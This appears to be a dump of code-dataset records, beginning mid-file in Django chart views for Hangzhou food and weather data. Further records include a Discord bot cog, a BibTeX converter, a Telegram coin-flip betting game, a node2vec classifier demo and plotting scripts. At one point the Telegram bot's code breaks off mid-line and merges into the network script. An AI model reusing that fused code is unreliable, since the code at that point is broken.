zone_bar.add('数量', zone, zone_count, is_label_show=True, xaxis_rotate=30)\n star_list = ['二星商户', '三星商户', '准四星商户', '四星商户', '准五星商户', '五星商户']\n star_data = food[food.star.isin(['二星商户', '三星商户', '准四星商户', '四星商户', '准五星商户', '五星商户'])]\n star_data['star'] = star_data['star'].astype('category')\n star_data['star'].cat.set_categories(star_list, inplace=True)\n star_data.sort_values('star', inplace=True)\n star_info = star_data.groupby('star').name.count()\n star = [i for i in star_info.index]\n star_count = [i for i in star_info.values]\n star_pie = Pie('商家星级比例', title_pos='center', title_top='bottom')\n star_pie.add('数量', star, star_count, is_label_show=True)\n context = dict(\n echart1=type_bar.render_embed(),\n echart2=zone_bar.render_embed(),\n echart3=star_pie.render_embed(),\n host=REMOTE_HOST,\n script_list=type_bar.get_js_dependencies()\n )\n return render(request, 'mysite/food1.html', context)\n\n\ndef food_page_second(request):\n food = pd.read_csv('../data/food.csv')\n price_data = food.dropna(subset=['price'])\n for i, price in enumerate(price_data.price.values):\n price_data.price.values[i] = price.strip('¥')\n price_data[['price']] = price_data[['price']].astype(int)\n price_data = price_data[price_data.price < 2000]\n price_data.rename(columns={'recommend.0': 'recommend0', 'recommend.1': 'recommend1', 'recommend.2': 'recommend2'},\n inplace=True)\n price = [i for i in price_data.price]\n price_data_high = price_data.sort_values(by='price', ascending=False).head(5)\n highs = [row for index, row in price_data_high.iterrows()]\n price_data_high_name = [i for i in price_data_high.name]\n price_data_high_price = [i for i in price_data_high.price]\n price_data_high_bar = Bar(\"人均消费水平最高的五家店铺\", width='600px', title_pos='center', title_top='bottom')\n price_data_high_bar.add('', price_data_high_name, price_data_high_price, xaxis_rotate=10, bar_category_gap='30%',\n yaxis_name='元', yaxis_name_pos='end')\n price_data_low = price_data.sort_values(by='price').head(5)\n lows = [row for index, row in price_data_low.iterrows()]\n price_data_low_name = [i for i in price_data_low.name]\n price_data_low_price = [i for i in price_data_low.price]\n price_data_low_bar = Bar(\"人均消费水平最低的五家店铺\", width='600px', title_pos='center', title_top='bottom')\n price_data_low_bar.add('', price_data_low_name, price_data_low_price, xaxis_rotate=10, bar_category_gap='30%',\n yaxis_name='元', yaxis_name_pos='end')\n price_data_sub = price_data[price_data.price < 500]\n price_info = price_data_sub.groupby('price').name.count()\n price_sub = [i for i in price_info.index]\n price_count = [i for i in price_info.values]\n price_limit = [i for i in price_info.index]\n price_scatter = Scatter(\"人均消费(<=500元)\", title_pos='center', title_top='bottom')\n price_scatter.add('', price_sub, price_count, extra_data=price_limit, is_visualmap=True, xaxis_name='人均/元',\n xaxis_name_pos='end', yaxis_name='店铺数量/家', yaxis_name_pos='end', visual_range=[0, 500])\n boxplot = Boxplot('人均消费箱型图', width='400px', title_pos='center', title_top='bottom')\n x_axis = ['']\n boxplot.add('', x_axis, boxplot.prepare_data([price]), yaxis_name='元', yaxis_name_pos='end')\n price_range = list(range(0, 201, 20))\n price_range.append(13000)\n price_data['range'] = pd.cut(price_data.price, price_range, right=True)\n price_data_range = price_data.groupby('range').name.count()\n x_range = ['(0, 20]', '(20, 40]', '(40, 60]', '(60, 80]', '(80, 100]', '(100, 120]',\n '(120, 140]', '(140, 160]', '(160, 180]', '(180, 200]', '>200']\n range_count = [i for i in price_data_range.values]\n line = Line(\"分区间人均消费水平\", width='600px', title_pos='center', title_top='bottom')\n line.add('', x_range, range_count, xaxis_rotate=30)\n context = dict(\n echart1=price_scatter.render_embed(),\n echart2=boxplot.render_embed(),\n echart3=line.render_embed(),\n echart4=price_data_high_bar.render_embed(),\n echart5=price_data_low_bar.render_embed(),\n highs=highs,\n lows=lows,\n price_data_high=price_data_high,\n price_data_high_name=price_data_high_name,\n price_data_high_price=price_data_high_price,\n host=REMOTE_HOST,\n script_list=price_scatter.get_js_dependencies()\n )\n return render(request, 'mysite/food2.html', context)\n\n\ndef food_page_third(request):\n food = pd.read_csv('../data/food.csv')\n comment_data = food.dropna(subset=['comment'])\n comment_data_most = comment_data.sort_values(by='comment', ascending=False).head(5)\n popular_shop = [row for index, row in comment_data_most.iterrows()]\n comment = [i for i in comment_data_most.comment]\n name = [i for i in comment_data_most.name]\n comment_bar = Bar(\"'网红'店铺\", width='600px', title_pos='center', title_top='bottom')\n comment_bar.add('', name, comment, xaxis_rotate=15, is_label_show=True)\n comment_data['name'] = comment_data['name'].map(lambda x: x.split('(')[0])\n shop = comment_data.groupby('name').name.count().sort_values(ascending=False).head(15)\n shop_name = [i for i in shop.index]\n shop_count = [i for i in shop.values]\n shop_bar = Bar(\"分店最多的店铺\", title_pos='center', title_top='bottom')\n shop_bar.add('', shop_name, shop_count, xaxis_rotate=30, is_label_show=True)\n context = dict(\n echart1=shop_bar.render_embed(),\n echart2=comment_bar.render_embed(),\n popular_shop=popular_shop,\n host=REMOTE_HOST,\n script_list=shop_bar.get_js_dependencies()\n )\n return render(request, 'mysite/food3.html', context)\n\n\ndef food_page_fourth(request):\n food = pd.read_csv('../data/food.csv')\n filter_data = food.groupby('type').filter(lambda x: x['name'].count() >= 100)\n score_data = filter_data.groupby('type')['name', 'taste', 'env', 'service'].mean()\n score_data.dropna(inplace=True)\n score_data_name = [i for i in score_data.index]\n score_data_taste = [i for i in score_data['taste']]\n score_data_env = [i for i in score_data['env']]\n score_data_service = [i for i in score_data['service']]\n line = Line(\"各菜系口味、环境、服务平均得分\", width='1200px', title_pos='center', title_top='bottom')\n line.add('口味', score_data_name, score_data_taste, xaxis_rotate=60)\n line.add('环境', score_data_name, score_data_env, xaxis_rotate=60)\n line.add('服务', score_data_name, score_data_service, xaxis_rotate=60)\n taste_high_data = food.sort_values(by='taste', ascending=False).head(5)\n env_high_data = food.sort_values(by='env', ascending=False).head(5)\n service_high_data = food.sort_values(by='service', ascending=False).head(5)\n schema = [\n (\"口味\", 10), (\"环境\", 10), (\"服务\", 10)\n ]\n rader1 = Radar(\"口味最好的五家店铺\", width='1000px', title_pos='center', title_top='bottom')\n rader1.config(schema)\n for index, row in taste_high_data.iterrows():\n rader1.add(row['name'], [[row.taste, row.env, row.service]], legend_selectedmode='single')\n rader2 = Radar(\"环境最好的五家店铺\", width='1000px', title_pos='center', title_top='bottom')\n rader2.config(schema)\n for index, row in env_high_data.iterrows():\n rader2.add(row['name'], [[row.taste, row.env, row.service]], legend_selectedmode='single')\n rader3 = Radar(\"服务最好的五家店铺\", width='1000px', title_pos='center', title_top='bottom')\n rader3.config(schema)\n for index, row in service_high_data.iterrows():\n rader3.add(row['name'], [[row.taste, row.env, row.service]], legend_selectedmode='single')\n context = dict(\n echart1=line.render_embed(),\n echart2=rader1.render_embed(),\n echart3=rader2.render_embed(),\n echart4=rader3.render_embed(),\n host=REMOTE_HOST,\n script_list=line.get_js_dependencies()\n )\n return render(request, 'mysite/food4.html', context)\n\n\ndef food_page_fifth(request):\n food = pd.read_csv('../data/food.csv')\n recommends = pd.concat([food['recommend.0'], food['recommend.1'], food['recommend.2']], )\n recommends = pd.DataFrame({'recommend': recommends})\n recommend_data = recommends.groupby('recommend').recommend.count().sort_values(ascending=False).head(200)\n recommend_name = [i for i in recommend_data.index]\n for i, name in enumerate(recommend_name):\n recommend_name[i] = name.strip('不少于')\n recommend_value = [i for i in recommend_data.values]\n worldcloud = WordCloud(width=1000, height=800)\n worldcloud.add(\"\", recommend_name, recommend_value, word_size_range=[10, 100], shape='star')\n context = dict(\n echart=worldcloud.render_embed(),\n host=REMOTE_HOST,\n script_list=worldcloud.get_js_dependencies()\n )\n return render(request, 'mysite/food5.html', context)\n\n\ndef spot_page_first(request):\n spot = pd.read_csv('../data/spot.csv')\n spot_sub_data = spot.head(200)\n spot_title = [i for i in spot_sub_data.title]\n spot_value = [1] * 200\n worldcloud = WordCloud(width=1000, height=800)\n worldcloud.add(\"\", spot_title, spot_value, word_size_range=[10, 10])\n context = dict(\n echart=worldcloud.render_embed(),\n host=REMOTE_HOST,\n script_list=worldcloud.get_js_dependencies()\n )\n return render(request, 'mysite/spot1.html', context)\n\n\ndef house_page_first(request):\n return render(request, 'mysite/house1.html')\n\n\ndef weather_page_first(request):\n weather = pd.read_csv('./data/weather.csv')\n date = [i for i in weather.date]\n max_temp = [i for i in weather['max']]\n min_temp = [i for i in weather['min']]\n line = Line(\"历史天气温度(2011年1月1日至2018年10月31日)\", width=1200, title_pos='center', title_top='bottom')\n line.add(\"一天中最高温度\", date, max_temp, is_datazoom_show=True)\n line.add(\"一天中最低温度\", date, min_temp, is_datazoom_show=True)\n max_max_all = weather.sort_values(by='max', ascending=False).head(3)\n max_max = [row for index, row in max_max_all.iterrows()]\n min_min_all = weather.sort_values(by='min').head(3)\n min_min = [row for index, row in min_min_all.iterrows()]\n above_t = [i for i in range(40, 32, -1)]\n below_t = [i for i in range(-3, 5, 1)]\n above_count = list(map(lambda i: weather[weather['max'] >= i].date.count(), above_t))\n below_count = list(map(lambda i: weather[weather['min'] <= i].date.count(), below_t))\n context = dict(\n echart=line.render_embed(),\n host=REMOTE_HOST,\n script_list=line.get_js_dependencies(),\n max_max=max_max,\n min_min=min_min,\n above_t=above_t,\n below_t=below_t,\n above_count=above_count,\n below_count=below_count\n )\n return render(request, 'mysite/weather1.html', context)\n\n\ndef weather_page_second(request):\n weather = pd.read_csv('./data/weather.csv')\n weather_data = weather.groupby('weather').weather.count().sort_values(ascending=False)\n weather_data.loc['其他'] = weather_data[weather_data.values <= 15].count()\n weather_data = weather_data[weather_data.values > 15]\n weather_category = [i for i in weather_data.index]\n weather_count = [i for i in weather_data.values]\n weather_pie = Pie('各种天气所占比例', width='1200px', height='700px', title_pos='center', title_top='bottom')\n weather_pie.add('数量', weather_category, weather_count, radius=[40, 75], label_text_color=None,\n is_label_show=True, legend_orient=\"vertical\", legend_pos=\"left\")\n weather_data_transform = weather.copy()\n for i, w in enumerate(weather_data_transform.weather):\n if w.find('雨') >= 0:\n weather_data_transform.weather[i] = '雨'\n weather_data_transform['date'] = weather_data_transform['date'].map(lambda x: x.split('-')[0])\n grouped = weather_data_transform.groupby(['date', 'weather']).weather.count()\n rain_data = grouped.unstack()['雨']\n year = [i for i in rain_data.index]\n rain_count = [i for i in rain_data.values]\n line = Line(\"每年下雨的天数\", width=800, title_pos='center', title_top='bottom')\n line.add('', year, rain_count)\n context = dict(\n echart1=weather_pie.render_embed(),\n echart2=line.render_embed(),\n host=REMOTE_HOST,\n script_list=weather_pie.get_js_dependencies(),\n )\n return render(request, 'mysite/weather2.html', context)\n\n\ndef weather_page_third(request):\n weather = pd.read_csv('./data/weather.csv')\n direction_data = weather.groupby('direction').direction.count().sort_values(ascending=False)\n direction_data.loc['其他'] = direction_data[direction_data.values <= 2].count()\n direction_data = direction_data[direction_data.values > 2]\n direction = [i for i in direction_data.index]\n direction_count = [i for i in direction_data.values]\n direction_pie = Pie('风向所占比例', width='1000px', height='600px', title_pos='center', title_top='bottom')\n direction_pie.add('数量', direction, direction_count, label_text_color=None, is_label_show=True,\n legend_orient=\"vertical\", legend_pos=\"left\")\n context = dict(\n echart1=direction_pie.render_embed(),\n host=REMOTE_HOST,\n script_list=direction_pie.get_js_dependencies(),\n )\n return render(request, \"mysite/weather3.html\", context)\n", "sub_path": "hangzhou/mysite/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 14695, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.shortcuts.render", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 14, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 18, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 23, "usage_type": "call"}, {"api_name": "pyecharts.Pie", "line_number": 33, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 46, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 59, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 66, "usage_type": "call"}, {"api_name": "pyecharts.Scatter", "line_number": 74, "usage_type": "call"}, {"api_name": "pyecharts.Boxplot", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 82, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 87, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 107, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 113, "usage_type": "call"}, {"api_name": "pyecharts.Bar", "line_number": 119, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 128, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 132, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 140, "usage_type": "call"}, {"api_name": "pyecharts.Radar", "line_number": 150, "usage_type": "call"}, {"api_name": "pyecharts.Radar", "line_number": 154, "usage_type": "call"}, {"api_name": "pyecharts.Radar", "line_number": 158, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 170, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 174, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "pyecharts.WordCloud", "line_number": 182, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 189, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 193, "usage_type": "call"}, {"api_name": "pyecharts.WordCloud", "line_number": 197, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 204, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 208, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 212, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 216, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 238, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 242, "usage_type": "call"}, {"api_name": "pyecharts.Pie", "line_number": 248, "usage_type": "call"}, {"api_name": "pyecharts.Line", "line_number": 260, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 268, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 272, "usage_type": "call"}, {"api_name": "pyecharts.Pie", "line_number": 278, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 286, "usage_type": "call"}]} +{"seq_id": "87089229", "text": "import discord\nimport os\nimport re\n\nfrom redbot.core import checks, Config, commands\n\nBaseCog = getattr(commands, \"Cog\", object)\n\n\nclass sthcommands(BaseCog):\n\n \"\"\"All STH reaction commands conveniently located in one file!\"\"\"\n\n default_global_settings = {\n \"channels_ignored\": [],\n \"guilds_ignored\": []\n }\n\n def __init__(self, bot):\n self.bot = bot\n self.conf = Config.get_conf(self, identifier=527690525)\n self.conf.register_global(\n **self.default_global_settings\n )\n\n @commands.guild_only()\n @commands.command()\n async def workout(self, ctx, arg):\n \"\"\"Get motivated to workout\"\"\"\n \n msg = arg\n await ctx.send(msg)\n\n\n embed = discord.Embed(\n description = 'ITS TIME MOTHERFUCKER!!!',\n color = discord.Color.red()\n )\n embed.set_image(url='https://media1.tenor.com/images/316802abc29c277b08bae799b1fbe52c/tenor.gif')\n await ctx.send(embed=embed)\n \n", "sub_path": "sthcommands/sthcommands.py", "file_name": "sthcommands.py", "file_ext": "py", "file_size_in_byte": 1007, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "redbot.core.commands", "line_number": 7, "usage_type": "argument"}, {"api_name": "redbot.core.Config.get_conf", "line_number": 21, "usage_type": "call"}, {"api_name": "redbot.core.Config", "line_number": 21, "usage_type": "name"}, {"api_name": "discord.Embed", "line_number": 35, "usage_type": "call"}, {"api_name": "discord.Color.red", "line_number": 37, "usage_type": "call"}, {"api_name": "discord.Color", "line_number": 37, "usage_type": "attribute"}, {"api_name": "redbot.core.commands.guild_only", "line_number": 26, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 26, "usage_type": "name"}, {"api_name": "redbot.core.commands.command", "line_number": 27, "usage_type": "call"}, {"api_name": "redbot.core.commands", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "618424406", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.4 (3310)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/mendeley2biblatex/__init__.py\n# Compiled at: 2016-07-20 10:13:03\n# Size of source mod 2**32: 1329 bytes\nimport sys\nfrom argparse import ArgumentParser\nfrom mendeley2biblatex.library_converter import LibraryConverter\n__all__ = [\n 'bib_entry', 'library_converter']\n\ndef main():\n \"\"\"Set this script some command line options. See usage.\"\"\"\n parser = ArgumentParser(description='Convert a sqlite database from mendeley to bibetex')\n parser.add_argument('-q', '--quiet', action='store_true', default=False, dest='quiet', help='Do not display any information.')\n parser.add_argument('-f', '--folder', default=None, dest='folder', help='Limit output to mendeley folder')\n parser.add_argument('-o', '--output', dest='bibtex_file', default=sys.stdout, help='BibTeX file name, else output will be printed to stdout')\n parser.add_argument('input', metavar='INPUT_FILE', nargs='?', help='the mendeley database')\n parser.add_argument('--version', action='version', version='mendeley2biblatex')\n args = parser.parse_args()\n if not args.input:\n parser.error('No file specified')\n LibraryConverter.convert_library(args.input, args.bibtex_file, args.quiet, args.folder)\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n print('Interrupted by user')", "sub_path": "pycfiles/mendeley2biblatex-0.1.8-py3.4/__init__.cpython-34.py", "file_name": "__init__.cpython-34.py", "file_ext": "py", "file_size_in_byte": 1496, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 16, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 19, "usage_type": "attribute"}, {"api_name": "mendeley2biblatex.library_converter.LibraryConverter.convert_library", "line_number": 25, "usage_type": "call"}, {"api_name": "mendeley2biblatex.library_converter.LibraryConverter", "line_number": 25, "usage_type": "name"}]} +{"seq_id": "622976454", "text": "from telegram.ext import *\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, KeyboardButton\nimport random\n\n############################### Bot ############################################\n\ncurrent_balance = 1000\nbet_size = 50\nuser_choice = ''\ndrawn_choice = ''\n\n\ndef start_message():\n return 'Welcome to Eta Eta! A classic game that offers 50/50 chance of winning.'\n\n\ndef start(update, context):\n update.message.reply_text(start_message())\n update.message.reply_text(main_menu_message(drawn_choice, bet_size, current_balance),\n reply_markup=main_menu_keyboard())\n\n\ndef conv(inp):\n if (inp == 'h'):\n return 1\n if (inp == 't'):\n return 0\n if (inp == 'cbs'):\n return 2\n if (int(inp) % 50 == 0):\n return 3\n\n\ndef main_menu(update, context):\n query = update.callback_query\n query.answer()\n cn = random.randint(0, 1)\n if (cn == 0):\n drawn_choice = 'Tails'\n else:\n drawn_choice = 'Heads'\n\n # query.message.reply_text(text=main_menu_message(drawn_choice,bet_size,current_balance),reply_markup=main_menu_keyboard())\n # print(query.data+'\\n')\n if (conv(query.data) == 3):\n global bet_size\n global current_balance\n bet_size = int(query.data)\n query.edit_message_text('Bet size changed to ' + query.data)\n query.message.reply_text(text=main_menu_message(drawn_choice, bet_size, current_balance),\n reply_markup=main_menu_keyboard())\n\n\n else:\n if (query.data == 'cbs'):\n query.edit_message_text('Choose bet size in coins', reply_markup=bet_choice_keyboard())\n if (query.data != 'cbs'):\n if(current_balance cutoff:\n graph.add_edge(node, f'patient:{patient}', value=value, status='sans')\n\n for patient_idx in range(n_patients_with):\n patient = patient_idx + n_nodes + n_patients_sans\n value = with_profile[node, patient_idx]\n if value > cutoff:\n graph.add_edge(node, f'patient:{patient}', value=value, status='with')\n\n print('Nodes', graph.number_of_nodes())\n print('Edges', graph.number_of_edges())\n\n # Fit embedding model to graph\n g2v = Node2Vec()\n g2v.fit(graph, verbose=True) # takes about 1 second\n\n print('Training and evaluating classifier')\n # Train classifier between nodes in community and outside of community\n x = [\n g2v.predict(f'patient:{patient_idx + n_nodes}')\n for patient_idx in range(n_patients_sans)\n ] + [\n g2v.predict(f'patient:{patient_idx + n_nodes + n_patients_sans}')\n for patient_idx in range(n_patients_with)\n ]\n y = [False] * n_patients_sans + [True] * n_patients_with\n\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.33, random_state=42)\n\n print(f'Training on {len(x_train)} samples')\n logistic_regression = LogisticRegression()\n logistic_regression.fit(x_train, y_train)\n\n print(f'Evaluating on {len(x_test)} holdout samples')\n y_pred = logistic_regression.predict(x_test)\n accuracy, mcc = accuracy_score(y_test, y_pred), matthews_corrcoef(y_test, y_pred)\n print('Accuracy:', accuracy)\n print('MCC:', mcc)\n\n return graph, g2v, logistic_regression,\n\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/lpe/network.py", "file_name": "network.py", "file_ext": "py", "file_size_in_byte": 3213, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "networkx.generators.duplication.duplication_divergence_graph", "line_number": 21, "usage_type": "call"}, {"api_name": "networkx.algorithms.community.greedy_modularity_communities", "line_number": 24, "usage_type": "call"}, {"api_name": "random.sample", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.random.normal", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 34, "usage_type": "attribute"}, {"api_name": "nodevectors.Node2Vec", "line_number": 54, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 68, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 71, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 76, "usage_type": "call"}, {"api_name": "sklearn.metrics.matthews_corrcoef", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "318862926", "text": "#! /usr/bin/env python\n#$ -S /home/masaki/programs/anaconda/envs/research/bin/python\n#$ -cwd\n\nimport os\nimport matplotlib.pyplot as plt\nfrom matplotlib import font_manager as fm\nimport numpy as np\nimport utils\n\ndef main():\n (curr_wk_dir, asset_dir, program_dir, conda_program_dir) = utils.getDirs()\n utils.initMpl()\n input_file = asset_dir + '/func_ncrnas.fa'\n ncrna_types = getNcrnaTypeRatio(input_file)\n print(ncrna_types)\n plt.axis('equal')\n (fig, ax) = plt.subplots()\n legend = ncrna_types.keys()\n colors = ['aqua', 'yellowgreen', 'gold', 'lightskyblue', 'lightcoral', 'magenta']\n radius = 1.0\n (patches, texts, autotexts) = ax.pie(ncrna_types.values(), colors = colors, autopct = '%1.1f%%', shadow = False, startangle = 90, radius = radius, pctdistance = radius * 1.15)\n ax.set_aspect('equal')\n ax.legend(patches, legend, loc = 2)\n # ax.set_title('Ratio of ncRNAs of type')\n proptease = fm.FontProperties()\n proptease.set_size('x-large')\n plt.setp(autotexts, fontproperties = proptease)\n # plt.show()\n fig.savefig(asset_dir + '/images/func_ncrna_stats.eps', bbox_inches = 'tight')\n \ndef getNcrnaTypeRatio(file): \n input_handle = open(file, 'rU')\n lines = input_handle.readlines()\n input_handle.close()\n ncrna_types = {}\n for line in lines: \n if not line.startswith('>'): \n continue\n rna_str_pos = line.find('RNA')\n ncrna_type = 'pseudogene' if rna_str_pos == -1 else line[3 : rna_str_pos].lower() + line[rna_str_pos : rna_str_pos + 3]\n if ncrna_type.find('tRNA') != -1: \n ncrna_type = 'tRNA'\n try: \n ncrna_types[ncrna_type] += 1\n except: \n ncrna_types[ncrna_type] = 1 \n return ncrna_types\n\nif __name__ == '__main__':\n main()\n", "sub_path": "src/get_func_ncrna_stats.py", "file_name": "get_func_ncrna_stats.py", "file_ext": "py", "file_size_in_byte": 1697, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "utils.getDirs", "line_number": 12, "usage_type": "call"}, {"api_name": "utils.initMpl", "line_number": 13, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.font_manager.FontProperties", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.font_manager", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.setp", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "281036527", "text": "# -*- coding: utf-8 -*-\nfrom PyQt4.QtCore import *\n# ---\nfrom datetime import datetime\nfrom datetime import timedelta\n# ---\nfrom dbgw import DbgwLite, DbgwMy\nfrom curve_pull import CurvePull\nfrom utils import *\nfrom excs import *\n\nDEFAULT_SELECT_INTERVAL = 48 # hours\nDEFAULT_X_SCALE_INTERVAL = 12 # hours\nDEFAULT_STEP_SIZE = 3600.0 # seconds\n\nTMP_INDEX = 0\nHMD_INDEX = 1\nMQ135_INDEX = 2\nMQ7_INDEX = 3\nPHOTO_INDEX = 4\n\nclass Plotter():\n\n def __init__(self):\n # ---\n self.db = None\n self.model = {}\n # ---\n\n def initialized(self):\n if not self.db:\n return False\n return True\n\n def init_my(self, params):\n self.db = DbgwMy()\n if not self.db.connect(params):\n return False\n return self.init_model()\n\n def init_lite(self, filename):\n self.db = DbgwLite()\n if not self.db.connect(filename):\n return False\n return self.init_model()\n\n def init_model(self):\n # ---\n init_date = self.db.get_dt_start()\n init_stamp = timestamp(init_date)\n to_date = self.db.get_dt_finish()\n from_date = to_date - timedelta(hours=DEFAULT_SELECT_INTERVAL) \n for device_tuple in self.db.select_devices():\n device = device_tuple[0]\n pull = CurvePull()\n stamps = []\n values = {}\n # -- data\n for row in self.db.select_data(device, from_date, to_date):\n stamps.append(timestamp(row[0]) - init_stamp)\n for index, value in enumerate(row[1:]):\n values.setdefault(index, []).append(value)\n pull.set_x_data(stamps)\n for index in sorted(values.keys()):\n pull.set_y_data(index, values[index])\n # --- x_scale\n x_max = stamps[-1]\n x_min = timestamp(to_date - timedelta(hours=DEFAULT_X_SCALE_INTERVAL)) - init_stamp\n pull.set_x_scale(x_min, x_max)\n # --- motion\n motion_stamps = []\n for row in self.db.select_event(device, 'MOTION', init_date, to_date): # !!! take all motions\n motion_stamps.append(timestamp(row[0]) - init_stamp)\n pull.set_m_markers(motion_stamps)\n # --- info\n info_stamps = []\n for row in self.db.select_event(device, 'INFO', init_date, to_date): # !!! take all info\n label = row[1]\n if label == \"ARDUINO STARTED\":\n label = \"*\"\n info_stamps.append((timestamp(row[0]) - init_stamp, label))\n pull.set_i_markers(info_stamps)\n # --- error\n error_stamps = []\n for row in self.db.select_event(device, 'ERROR', init_date, to_date): # !!! take all errors\n error_stamps.append((timestamp(row[0]) - init_stamp, row[1]))\n pull.set_e_markers(error_stamps)\n # ---\n self.model[device] = pull\n # ---\n self.init_date, self.from_date, self.to_date = init_date, from_date, to_date\n self.finish_date = self.db.get_dt_finish()\n self.init_stamp = init_stamp\n return True\n\n def get_more_data(self):\n to_date = self.from_date\n from_date = to_date - timedelta(hours=DEFAULT_SELECT_INTERVAL)\n if from_date < self.init_date:\n return\n init_stamp = timestamp(self.init_date)\n for device in self.devices():\n pull = self.model[device]\n stamps = []\n values = {}\n # -- data\n for row in self.db.select_data(device, from_date, to_date):\n stamps.append(timestamp(row[0]) - init_stamp)\n for index, value in enumerate(row[1:]):\n values.setdefault(index, []).append(value)\n pull.prepend_x_data(stamps)\n for index in sorted(values.keys()):\n pull.prepend_y_data(index, values[index])\n # ---\n self.from_date, self.to_date = from_date, to_date\n\n def devices(self):\n return sorted(self.model.keys())\n\n def curve(self, device, index):\n return self.model[device].curve(index)\n\n def x_scale(self, device):\n return self.model[device].get_x_scale()\n\n def m_markers(self, device):\n return self.model[device].get_m_markers()\n\n def i_markers(self, device):\n return self.model[device].get_i_markers()\n\n def e_markers(self, device):\n return self.model[device].get_e_markers()\n\n def back_step(self):\n for device in self.devices():\n pull = self.model[device]\n try:\n pull.move_scale_left( DEFAULT_STEP_SIZE )\n except ScaleError:\n self.get_more_data()\n\n def forward_step(self):\n for device in self.devices():\n pull = self.model[device]\n try:\n pull.move_scale_right( DEFAULT_STEP_SIZE )\n except ScaleError:\n pass\n\n def x_scale_dt(self):\n from_date = self.finish_date\n to_date = self.init_date\n for device in self.devices():\n scale_min, scale_max = self.x_scale(device)\n scale_min_dt = from_timestamp(scale_min + self.init_stamp)\n scale_max_dt = from_timestamp(scale_max + self.init_stamp)\n from_date = min(from_date, scale_min_dt)\n to_date = max(to_date, scale_max_dt)\n return from_date, to_date\n\n def timestamp_dt(self, stamp):\n return from_timestamp(stamp + self.init_stamp)\n\n", "sub_path": "plotter.py", "file_name": "plotter.py", "file_ext": "py", "file_size_in_byte": 5562, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "dbgw.DbgwMy", "line_number": 36, "usage_type": "call"}, {"api_name": "dbgw.DbgwLite", "line_number": 42, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 52, "usage_type": "call"}, {"api_name": "curve_pull.CurvePull", "line_number": 55, "usage_type": "call"}, 